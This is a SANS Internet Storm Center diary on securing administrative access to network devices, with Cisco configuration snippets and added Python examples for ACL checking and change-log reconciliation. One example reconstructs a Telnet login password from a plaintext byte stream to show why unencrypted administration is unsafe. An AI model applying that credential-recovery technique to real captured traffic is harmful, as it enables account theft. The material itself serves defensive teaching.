People love default credentials. I've actually had a customer tell me "if we forget the password, we can just google for it", as if somehow that's a good thing. Even for gear that ships with default credentials that force you to change them on login (for instance, fiber channel switches), I've seen other engineers then change the password back to the default, their rationale being that it reduces their support calls later.
The number of bladecenters I've seen where the default admin user and password had been changed, I think I can count without taking my shoes off (i.e., it's a small number; almost nobody changes their bladecenter admin password). This access gives the right to power off servers, decommission servers, unpatch servers, hack Windows or Linux passwords; almost everything is possible. Bladecenter admin access gives you the near-equivalent of physical access, and we all know that physical access trumps almost every control in the book.
People, default credentials are BAD. If you are using the default userid and password and someone compromises you, we don't call that hacking, we call it logging in. You don't need an uber-hacker to target you in this situation; ANYONE WITH GOOGLE can compromise you. Change the admin password on your gear, and if possible, change the admin userid. Better yet, back admin logins with another directory (read on ...).
Prevent Access in the First Place - Access Classes
Many products will allow you to restrict administrative access in the configuration. For instance, Cisco gear has the access-class config statement. HP, Brocade, Juniper and others all have an equivalent construct. The commands you'd put in your switch or router config might be:
first, define the subnet or IP addresses of authorized administrative workstations. The second argument on a subnet entry is a wildcard (inverse) mask, not a subnet mask, and any address that matches no entry hits the implicit deny at the end of the list:
ip access-list standard ACL-ACCESS-CLASS
 permit host 192.168.72.10
 permit 192.168.68.0 0.0.0.255
next, apply the ACL to the vty lines (access-class only governs the vty lines; console and aux access is a physical-security matter):
line vty 0 15
 access-class ACL-ACCESS-CLASS in
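As an added illustration (not part of the original diary, and not vendor code), here is a small Python evaluator for IOS standard ACLs of the kind used with access-class. It takes the ACL above plus a deliberately wrong version that uses a subnet mask where IOS expects a wildcard mask, and reports which source addresses each would admit to the vty lines. The candidate addresses are made up for the example.

```python
"""IOS standard ACL evaluator for access-class rules.

Added example for this diary, not code from the original post or from
Cisco. It shows what the wildcard (inverse) mask in a standard ACL actually
matches and that an address matching no entry hits the implicit deny at the
end of every IOS ACL. The first ACL is the one from the diary; the second,
and the candidate addresses, are constructed to show a common mistake."""
import ipaddress

ACL_TEXT = """
ip access-list standard ACL-ACCESS-CLASS
 permit host 192.168.72.10
 permit 192.168.68.0 0.0.0.255
"""

# Same intent, but written with a subnet mask where IOS expects a wildcard.
MISTAKEN_ACL_TEXT = """
ip access-list standard ACL-ACCESS-CLASS
 permit host 192.168.72.10
 permit 192.168.68.0 255.255.255.0
"""

def _addr(text):
    return int(ipaddress.IPv4Address(text))

def parse_standard_acl(text):
    """Return the entries as (action, network_int, wildcard_int), in order."""
    entries = []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0] not in ("permit", "deny"):
            continue                      # header line or blank line
        action = parts[0]
        if parts[1] == "host":            # permit host A.B.C.D
            net, wild = parts[2], "0.0.0.0"
        elif parts[1] == "any":           # permit any
            net, wild = "0.0.0.0", "255.255.255.255"
        elif len(parts) == 2:             # permit A.B.C.D (implicit host)
            net, wild = parts[1], "0.0.0.0"
        else:                             # permit A.B.C.D W.X.Y.Z
            net, wild = parts[1], parts[2]
        entries.append((action, _addr(net), _addr(wild)))
    return entries

def acl_permits(entries, src):
    """First matching entry wins; no match is the implicit 'deny any'."""
    a = _addr(src)
    for action, net, wild in entries:
        # In a wildcard mask a 1 bit means "don't care" and a 0 bit means
        # "must match", the inverse of a subnet mask.
        care = ~wild & 0xFFFFFFFF
        if (a & care) == (net & care):
            return action == "permit"
    return False

def audit(acl_text, candidates):
    """Map each candidate source address to True (permitted) or False."""
    entries = parse_standard_acl(acl_text)
    return {src: acl_permits(entries, src) for src in candidates}

if __name__ == "__main__":
    candidates = ["192.168.72.10", "192.168.72.11", "192.168.68.200", "10.99.99.0"]
    for label, acl in (("wildcard", ACL_TEXT), ("subnet-mask mistake", MISTAKEN_ACL_TEXT)):
        print(label, audit(acl, candidates))
```

Run it and compare the two results: with the real wildcard, 192.168.68.200 is admitted and 10.99.99.0 is not; with the subnet-mask mistake the ACL admits any address whose last octet is zero and denies the management subnet it was meant to allow. Reading back the running ACL after applying it, and testing a connection from an unauthorized address, catches this kind of error before an attacker does.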
Prevent Access in the First Place, Reloaded - Define a Management Network
Even with all the other controls we'll talk about, implementing a management network is a good move. It zones all infrastructure administration into one place, and you can control access to this network using VPN controls or a jump box. The VPN approach is a neat one: if you are an authorized admin, you use an IPsec or SSL VPN to get an address on the management network, and from there you can administer your gear from anywhere in the company. This is really handy for admins who are mobile within the company or have to provide support from home (or the cottage, the beach, or anywhere else they can find you).
Encrypt all Administrative Accesses
I still see LOTS of admin access over plain HTTP and Telnet. And there are LOTS of tools that will strip passwords out of this type of traffic - you can do this with Cain if you want a GUI, but even doing it with Wireshark or tcpdump is pretty simple. Be sure to force SSH (version 2; version 1 has known protocol weaknesses and should be disabled outright) or HTTPS for administration of critical network infrastructure.
Even what you might consider non-critical infrastructure should see the same protections. I've done a pentest on a company that used Telnet to administer their UPS gear (to monitor temperature and humidity as well as power characteristics, and to remotely control power, etc.). Unfortunately for them, they used their AD admin password to log in to the UPS, which they accessed using plaintext HTTP and Telnet. Doubly unfortunate, as a standard procedure they logged in each morning to check logs etc.
Checking logs daily would normally be a really good thing if they had other controls in place (for instance, using HTTPS or SSH for administration), but since they were being pentested, I had their admin password within 10 minutes of starting the actual process!
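To make concrete why that plaintext Telnet session cost them the password, here is an added Python example (not from the original diary, and not how Cain or Wireshark are built) that takes the client-to-server half of a Telnet session, strips the option negotiation and reassembles the keystrokes. The byte stream it works on is constructed for the example; the assumption that the first two lines typed are a username and a password is simply the usual login sequence on gear with local or AAA accounts.

```python
"""Recover a login typed over Telnet from the client-to-server byte stream.

Added example for this diary, not code from the original post. It does
offline what Cain or Wireshark's "Follow TCP Stream" does: strip Telnet
option negotiation, replay the user's backspaces, and split the keystrokes
into lines. Nothing is decrypted, because nothing was encrypted. The byte
stream below is constructed for the example; a real client sends one
keystroke per TCP segment, which changes nothing once the payloads are
concatenated in order."""

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

# Constructed client->server data: terminal-type and window-size
# negotiation, then a username, a password with a corrected typo (0x7f is
# DEL, which most clients send for Backspace), then a command.
CLIENT_STREAM = (
    bytes([IAC, WILL, 24, IAC, WILL, 31, IAC, SB, 31, 0, 80, 0, 24, IAC, SE])
    + b"admin\r\n"
    + b"Summ3r\x7f!2010\r\n"
    + b"enable\r\n"
)

def strip_negotiation(stream):
    """Drop IAC command sequences; return only the bytes the user typed."""
    out = bytearray()
    i = 0
    while i < len(stream):
        b = stream[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= len(stream):          # truncated command at end of capture
            break
        cmd = stream[i + 1]
        if cmd == IAC:                    # IAC IAC is an escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            i += 3                        # IAC <cmd> <option>
        elif cmd == SB:                   # subnegotiation runs until IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = len(stream) if end < 0 else end + 2
        else:
            i += 2                        # other two-byte commands (NOP, GA, ...)
    return bytes(out)

def reassemble_lines(data):
    """Apply Backspace/DEL edits and cut lines at CR, as the device does."""
    lines, cur = [], bytearray()
    for b in data:
        if b in (0x08, 0x7f):             # BS or DEL: erase the previous character
            if cur:
                cur.pop()
        elif b == 0x0d:                   # CR ends the line
            lines.append(cur.decode("ascii", "replace"))
            cur = bytearray()
        elif b in (0x0a, 0x00):           # LF / NUL that Telnet sends after CR
            continue
        else:
            cur.append(b)
    if cur:
        lines.append(cur.decode("ascii", "replace"))
    return lines

def recover_login(stream):
    """Assumes (for the example) the device prompted for username, then password."""
    lines = reassemble_lines(strip_negotiation(stream))
    if len(lines) < 2:
        return None
    return {"username": lines[0], "password": lines[1], "commands": lines[2:]}

if __name__ == "__main__":
    print(recover_login(CLIENT_STREAM))
```

The point of the example is that there is no cryptographic step anywhere in it; anyone positioned on the path (a span port, a poisoned ARP cache, a compromised switch) needs nothing more than this. The same holds for HTTP Basic authentication, where the credentials are merely base64-encoded in a header.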
On a Cisco router or switch, the commands you need to set up SSH are:
first, define a hostname and domain name (the RSA key is named after them, so both must exist before the key is generated)
hostname yourdevicename
ip domain-name yourcompany.com
next, generate the key
(use a modulus of 2048 or larger; 1024-bit RSA keys are no longer considered adequate)
crypto key generate rsa general-keys modulus 2048
next, force SSH version 2 and allow only SSH on the vty lines (the transport input line is what actually turns Telnet off)
ip ssh version 2
line vty 0 15
 transport input ssh
SSH logins are username-based, so the vty lines also need either login local with a configured username and secret, or the AAA configuration discussed below; a bare line password is not enough for SSH.
If you allow web administrative access (that's a whole different discussion), forcing HTTPS on network infrastructure is generally even easier:
disable plaintext HTTP
no ip http server
enable SSL encrypted HTTPS (entering this line generates the self-signed certificate used to encrypt the web admin sessions)
ip http secure-server
To go one better, I'd also suggest that you replace the self-signed certificate that is used by default for HTTPS admin on most gear with one issued by a CA your admin workstations trust, and for SSH, verify host-key fingerprints out of band (or use SSH host certificates where the gear supports them) rather than clicking through the first-connection prompt. Encryption on its own only defeats a passive sniffer; if admins are in the habit of accepting unverified certificates and host keys, tools like ettercap can still mount a man-in-the-middle attack and recover passwords.
Back-end Authentication and Change Logging
After everything else is said and done, there's still way too much gear out there that has a single administrative account, or no accounts at all (only access passwords). This plays hob with managing change - since every config update is done using the single admin account, if a change goes bad everyone on your team can deny making it. (Does your team have Ida Know as an honorary member?) If you don't take a stab at non-repudiation of changes, this WILL bite you eventually.
So, what to do? Should you define a userid for each and every user on all your infrastructure gear? Well, only as a last resort. Most network infrastructure can back-end authentication and access control to an external source. Popular back-ends are what you'd expect - RADIUS, TACACS+, Kerberos, LDAP and Active Directory. I'd say pick one and go with it. I often go with RADIUS back-ended with AD (IAS, now NPS) because it's simple, easy to troubleshoot, and supported by almost everything. Mind you, RADIUS brings its own exposure: the traffic between the device and the server is protected only by the shared secret (user passwords are obfuscated with an MD5-based scheme keyed on that secret), so anyone who can capture it can attack the secret offline. You can mitigate that by putting your RADIUS server on a private VLAN or the management network, using a long random shared secret per device, and making other intelligent design decisions to implement security controls.
Basic definition of AAA, as well as the definition of the RADIUS server
(Note that the RADIUS server config will need to match this: the same shared secret and the same ports. 1645/1646 are the legacy RADIUS ports that IOS still defaults to; the IANA-assigned ports are 1812/1813, and most current servers listen there. Newer IOS releases express the same values in a named radius server block instead of this one-liner.)
aaa new-model
radius-server host 1.2.3.4 auth-port 1645 acct-port 1646 key randomcharkey
this line forces RADIUS authentication for login by default. If RADIUS is down (i.e. no response is received from the RADIUS server, or the server has been marked dead), then local authentication still works. Note the distinction: a reject from the RADIUS server is a failed login, full stop; the local user database is consulted only when no RADIUS server answers. On one hand this leaves you open to attacks that involve DoSing your RADIUS server and then guessing the local credentials, so the local account needs a strong, vaulted password rather than a convenient one. On the other hand, you still have access to your network gear if your RADIUS servers or domain controllers are offline.
aaa authentication login default group radius local
defining the source interface is important, since the RADIUS server identifies the device by the source IP of its requests, which is normally hard-coded in the server's client list; requests from any other address are silently dropped
ip radius source-interface Vlan1
the "default" method list above applies to all lines automatically; on some gear, or if you have defined a named method list instead, you need to apply it to the individual lines explicitly (the name given here must be a list you have actually defined):
line vty 0 15
 login authentication default
line console 0
 login authentication default
line aux 0
 login authentication default
Don't forget to LOG ALL ACCESSES (RADIUS and TACACS+ accounting give you this) and LOG ALL CONFIG CHANGES (lots of tools will do this for you - syslog will log that a change occurred and who made it; CatTools and RANCID (thanks to our reader Bmac for this correction) are 2 that come to mind for more complete change logging, and I've also written shell scripts to do this. Feel free to suggest others that you use as a comment to this diary). In some cases you may also want to log every configuration command as well (most gear will let you do this via syslog), which is what lets you tie a specific change to a specific person and time.
What does this give you? As changes occur, you are notified that a change happened, who made it, and what it was. You can then compare this to the CHANGE REQUEST FORM that you have in your CHANGE CONTROL SYSTEM, to be sure that:
the change made was both requested and approved
the change happened during the change window
the person making the change was the one authorized to do it
if it was an unauthorized change, you have the culprit identified and can have, shall we say, a discussion that's appropriate to the situation.
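The reconciliation described in the list above can be scripted. This added Python example (not code from the original diary, nor from CatTools or RANCID) parses the two syslog messages an IOS device emits when its configuration changes, %SYS-5-CONFIG_I when someone leaves configuration mode and %PARSER-5-CFGLOG_LOGGEDCMD for each command when command logging is enabled, and checks each event against a list of approved change windows. The syslog lines, change records, device addresses and user names are constructed for the example, and the collector's line prefix (time, device IP, sequence number) is an assumption about how the log server writes its files.

```python
"""Reconcile IOS configuration-change syslog messages with approved changes.

Added example for this diary, not code from the original post or any of
the tools it names. It parses the two messages an IOS device emits when its
configuration changes (%SYS-5-CONFIG_I when someone leaves config mode, and
%PARSER-5-CFGLOG_LOGGEDCMD for each command when command logging is on)
and checks each against a list of approved change windows. The syslog lines
and change records are constructed for the example; the collector prefix
(timestamp, device address, sequence number) is an assumption."""
import re
from datetime import datetime

# Constructed sample: collector prefix, the device's own timestamp, message.
SYSLOG = """\
Jun 12 02:14:04 192.168.1.1 1841: Jun 12 02:14:04.991: %PARSER-5-CFGLOG_LOGGEDCMD: User:rob  logged command:interface Vlan1
Jun 12 02:14:06 192.168.1.1 1842: Jun 12 02:14:06.512: %SYS-5-CONFIG_I: Configured from console by rob on vty0 (192.168.72.10)
Jun 12 02:20:11 192.168.1.1 1850: Jun 12 02:20:11.003: %PARSER-5-CFGLOG_LOGGEDCMD: User:mallory  logged command:no logging 192.168.5.7
Jun 12 14:31:21 192.168.1.1 1903: Jun 12 14:31:21.004: %PARSER-5-CFGLOG_LOGGEDCMD: User:dave  logged command:no ip http secure-server
Jun 12 14:31:29 192.168.1.1 1904: Jun 12 14:31:29.880: %SYS-5-CONFIG_I: Configured from console by dave on vty1 (10.20.30.40)
Jun 12 15:02:40 192.168.1.2 0311: Jun 12 15:02:40.110: %SYS-5-CONFIG_I: Configured from console by vty0 (10.20.30.40)
"""

# Constructed change records, as exported from a change-control system.
CHANGE_WINDOWS = [
    {"ticket": "CHG-1042", "device": "192.168.1.1", "user": "rob",
     "start": "2010-06-12 02:00", "end": "2010-06-12 03:00"},
    {"ticket": "CHG-1050", "device": "192.168.1.1", "user": "dave",
     "start": "2010-06-12 20:00", "end": "2010-06-12 21:00"},
]

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<device>\d+\.\d+\.\d+\.\d+) .*?"
    r"%(?P<mnemonic>SYS-5-CONFIG_I|PARSER-5-CFGLOG_LOGGEDCMD): (?P<body>.*)$")
# Without AAA the CONFIG_I message has no "<user> on" part, only the line.
CONFIG_I_RE = re.compile(
    r"Configured from \S+ by (?:(?P<user>\S+) on )?(?P<line>\S+)(?: \((?P<src>[^)]+)\))?")
CFGLOG_RE = re.compile(r"User:(?P<user>\S+)\s+logged command:(?P<command>.*)")

def parse_events(text, year):
    """Yield one dict per config-change message; ignore everything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; the caller supplies it.
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ev = {"time": when, "device": m["device"], "user": None, "src": None, "command": None}
        if m["mnemonic"] == "SYS-5-CONFIG_I":
            d = CONFIG_I_RE.search(m["body"])
            if d:
                ev.update(user=d["user"], src=d["src"])
        else:
            d = CFGLOG_RE.search(m["body"])
            if d:
                ev.update(user=d["user"], command=d["command"].strip())
        yield ev

def classify(ev, windows):
    """Say whether a change was approved and, if not, which control failed."""
    fmt = "%Y-%m-%d %H:%M"
    for_device = [w for w in windows if w["device"] == ev["device"]]
    if not for_device:
        return "no change request for this device"
    open_now = [w for w in for_device
                if datetime.strptime(w["start"], fmt) <= ev["time"] <= datetime.strptime(w["end"], fmt)]
    if not open_now:
        return "outside any approved window"
    if ev["user"] is None:
        return "no user identity (device lacks AAA); cannot attribute"
    for w in open_now:
        if w["user"] == ev["user"]:
            return f"approved under {w['ticket']}"
    return "unauthorized user during " + ", ".join(w["ticket"] for w in open_now)

def reconcile(text, windows, year):
    """Return (event, verdict) pairs in syslog order."""
    return [(ev, classify(ev, windows)) for ev in parse_events(text, year)]

def unauthorized(text, windows, year):
    """Just the changes someone should be having a discussion about."""
    return [(ev, v) for ev, v in reconcile(text, windows, year) if not v.startswith("approved")]

if __name__ == "__main__":
    for ev, verdict in reconcile(SYSLOG, CHANGE_WINDOWS, 2010):
        who = ev["user"] or "?"
        what = ev["command"] or "left configuration mode"
        print(f"{ev['time']:%b %d %H:%M:%S} {ev['device']} {who:8} {what:30} -> {verdict}")
```

Two things the sample is built to show: the device at 192.168.1.2 logs a change with no user name because it has no AAA, so there is nobody to hold accountable; and the command-level log is what reveals that the change in the middle of rob's window was someone else turning off logging. None of this works unless the device clocks are NTP-synchronized to the same source as the change-control system.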
Basic commands for simple syslog logging and NTP time sync are, well, pretty simple (as with most examples in this diary, it can get more complicated):
Basic syslog logging is a one-liner
logging 192.168.5.7
Similarly, setting a host to get time from is also very simple (without trustworthy, synchronized time on every device, the change logs above can't be lined up against your change windows)
ntp server 192.168.5.6
I've phrased this discussion in the context of network infrastructure gear, but really many of these points extend to other datacenter infrastructure components as well. Replacing default certificates used for RDP to critical Windows servers is a good move, as is updating the certificates for things like VMware vSphere (both vCenter servers and ESX hosts). Using a management network is an important part of designing a virtual infrastructure from any vendor, as well as bladecenters (for the same reasons). Management networks can also be used to protect things like RADIUS authentication, syslog, NTP and SNMP-based network management, all of which travel in cleartext (or, in the case of RADIUS, with only a shared secret between them and an attacker) in their default forms. Back-end authentication to an enterprise directory (often AD) is a common solution for authentication, and is useful, as we discussed, for managing and auditing change on both Linux and VMware servers, as well as on lots of other gear besides just routers and switches.
I'm hoping that you find these suggestions to be a helpful starting point. There's lots more that can be done in this area, please use the comment feature to let us know if you've found this useful, have your own stories in this area, or if I've missed (or messed up) anything in this diary.
=============== Rob VandenBrink, Metafore ===============
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.